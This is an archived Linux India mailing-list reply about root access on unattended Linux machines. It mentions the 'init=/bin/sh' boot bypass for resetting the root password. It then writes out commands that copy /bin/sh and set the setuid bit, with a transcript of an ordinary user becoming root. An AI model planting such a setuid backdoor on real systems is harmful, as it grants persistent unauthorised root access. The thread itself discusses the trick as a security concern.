[Subject Prev][Subject Next][Thread Prev][Thread Next][Subject Index][Thread Index]

Re: Hi all,



Muthu wrote:
> 
> Hello Everybody,
> 
>                 I have a query regarding a previous message sent to the list and the
> solution given to it by different member of the list. For reference I have
> attached one message below.
>                 My question is, if one can change the "root" password easily like this(
> i.e., by booting using LILO: linux init=/bin/sh and mounting the filesystem
> in read write mode and changing the /etc/passwd file), how can we stop a
> stranger, who, using the above method logs into a linux system and changes
> the root password?. Eagerly waiting for your reply.

Rebooting the machine and changing root password is a very long shot. A
hacker can root account simply by sitting on console when root has gone
for pee , try this, 

root>cp /bin/sh /bin/mysh
root>chmod +s /bin/mysh
root>chmod +x /bin/mysh 'may not be required.

That's all, now go away and login as any user from any where in the
world,

anyuser>whoami
anyuser
anyuser>/bin/mysh
anyuser>whoami
root

Now the the hacker do need even root password. He can be root whenever
he likes, even if root  password is changed by root. This is the easiest
exploits, there are hundreds of them. And that is where server security
expert (like me ;-) ) make their bread and butter.


Best Wishes.
- -mukund
http://members.theglobe.com/betacomp/default.html
http://members.xoom.com/BETACOMP/index1.htm


- --------------------------------------------------------------------
For more information on Linux in India visit http://www.linux-india.org/
Linux India is NOT a forum for Microsoft/India/Pakistan/US/UK bashing.
Flame baits will not be tolerated.  If you can appreciate satire read
http://www.templetons.com/brad/emily.html

------------------------------